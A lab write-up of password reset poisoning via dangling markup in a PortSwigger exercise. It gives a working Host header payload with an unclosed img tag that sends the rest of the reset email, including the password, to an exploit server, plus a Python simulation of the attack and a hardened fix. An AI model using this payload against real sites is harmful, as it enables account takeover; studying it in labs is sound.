Host Header Manipulations — Password reset poisoning via dangling markup
I tried several methods, but here I will focus on the solution and the underlying logic rather than on how the vulnerability was discovered. Everything of interest happens in the raw content of the password reset email, specifically in its HTML.
<p>Hello!</p><p>Please
<a href='https://0a74005d04afe10a80a90d2f00560028.web-security-academy.net/login'> click here</a> to login with your new password: uXnd8nC8ym</p><p>Thanks,<br/>Support team</p><i> This email has been scanned by the MacCarthy Email Security service</i>
Given the lab title, the injection point has to be the href of the <a> tag, and that href is built from the Host header of the password reset request. As a first attempt, let's try to close the <a href='...'> tag from the Host header.
That attempt got a 504 Gateway Timeout: the server did not accept a modified Host header. This is an expert lab, so I assumed the weak point was in how the Host header is parsed and validated. As I mentioned at the beginning, I tried several methods; the techniques that worked come from the learning section of the PortSwigger Web Security Academy.
1. Added an arbitrary port to the original host, such as ":12345", and the request is accepted: the validation evidently stops at the hostname and does not cover the port.
2. With the port in place, I closed the <a href> tag (a quote and a closing angle bracket after the port). Success! I am on the right track.
As the screenshot above shows, the injected characters are starting to take effect in the email.
3. I added an <img> tag whose src points at my exploit server.
4. The completed value appended to the Host header is: :12345'><img src="https://exploit-server?/
Two things in the payload matter. First, the <img> tag and its src attribute are deliberately left unclosed: the markup dangles, so the email client treats everything that follows, up to the next double quote, as part of the src URL, including the line with the new password. Second, the ?/ right after the exploit server host turns all of that swallowed text into the query string of the image request, so the rest of the email content arrives in the exploit server's access log and can be read from there.
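To make the underlying logic concrete, the following is an added Python simulation (my own example, not the lab's code and not the author's): it models the lab's lenient Host check as a hostname-only comparison, reconstructs the vulnerable email template from the email quoted above, and assumes an email-client wrapper page that supplies the closing double quote after the body. It then shows the dangling src swallowing the rest of the email and the password being pulled out of the resulting exploit-server URL, next to a hardened builder that rejects the port trick. The host check, the wrapper page and all function names are assumptions, not observations from the lab.

```python
"""Simulation of the password reset poisoning via dangling markup described
above. Added example: the server template, the Host header check and the
email-client wrapper are assumptions modelling the observed behaviour, not
code from PortSwigger or from the write-up."""
import html
import re
from typing import Optional, Tuple
from urllib.parse import urlsplit, unquote

LAB_HOST = "0a74005d04afe10a80a90d2f00560028.web-security-academy.net"
EXPLOIT_HOST = "exploit-server"  # placeholder, as in the write-up

# Reconstructed from the email body quoted in the post; the real server-side
# template is not shown there.
EMAIL_TEMPLATE = (
    "<p>Hello!</p><p>Please <a href='https://{host}/login'> click here</a>"
    " to login with your new password: {password}</p>"
    "<p>Thanks,<br/>Support team</p>"
    "<i> This email has been scanned by the MacCarthy Email Security service</i>"
)

# Assumed email-client page: the body is embedded before another
# double-quoted attribute, which is what finally terminates the dangling src.
CLIENT_WRAPPER = (
    '<div class="email-body">{body}</div><div class="footer">Inbox</div>'
)


def lenient_host_check(host_header: str) -> bool:
    """Assumed model of the lab's check that explains steps 1 and 2: only the
    text before the first ':' (the hostname) is compared, the 'port' is not."""
    hostname = host_header.split(":", 1)[0]
    return hostname == LAB_HOST


def build_reset_email(host_header: str, password: str) -> str:
    """Vulnerable: the accepted Host header is reflected into the link
    without any HTML escaping."""
    if not lenient_host_check(host_header):
        raise ValueError("504-style rejection: unknown host")
    return EMAIL_TEMPLATE.format(host=host_header, password=password)


def dangling_payload(lab_host: str, exploit_host: str) -> str:
    """The write-up's final Host header: real host, bogus port, close the
    href quote and the <a> tag, then open an <img> whose src never closes."""
    return f"{lab_host}:12345'><img src=\"https://{exploit_host}?/"


def img_src_as_rendered(page: str) -> Optional[str]:
    """Model of the tokenizer's double-quoted attribute value state: the value
    runs from the opening quote to the next '"', whatever lies in between
    (tags, the password line, newlines)."""
    m = re.search(r'<img src="([^"]*)"', page)
    return m.group(1) if m else None


def password_from_exfil_url(url: str) -> Optional[str]:
    """What the attacker does with the URL in the exploit server's access log:
    everything after '?' is the swallowed email; decode it and pull out the
    password."""
    query = unquote(urlsplit(url).query)
    m = re.search(r"new password: ([^<\s]+)", query)
    return m.group(1) if m else None


def run_attack(password: str = "uXnd8nC8ym") -> Tuple[str, Optional[str]]:
    """End to end: poisoned email -> client renders it -> leaked URL -> password."""
    email = build_reset_email(dangling_payload(LAB_HOST, EXPLOIT_HOST), password)
    page = CLIENT_WRAPPER.format(body=email)
    src = img_src_as_rendered(page) or ""
    return src, password_from_exfil_url(src)


def build_reset_email_safe(host_header: str, password: str) -> str:
    """Hardened variant: require an exact Host match (port included), build the
    link from the configured canonical host rather than the request, and
    escape anything that reaches the template anyway."""
    if host_header != LAB_HOST:
        raise ValueError("Host header does not match the canonical host")
    return EMAIL_TEMPLATE.format(host=html.escape(LAB_HOST, quote=True),
                                 password=html.escape(password, quote=True))


def safe_builder_rejects(host_header: str) -> bool:
    """True when the hardened builder refuses the given Host header."""
    try:
        build_reset_email_safe(host_header, "irrelevant")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    leaked_url, leaked_password = run_attack()
    print("exploit server log entry:", leaked_url)
    print("recovered password:", leaked_password)
```

Running the script prints the URL the exploit server would log, with the closed-off href, the "click here" text and the password line all sitting in the query string. Note the role of the wrapper: the src value only ends at the next double quote, so what the attacker receives depends on where the email client's own page next has one; if nothing after the body contains a double quote the attribute never terminates and the capture can fail, which is why this model embeds the body in a page with a later quoted attribute.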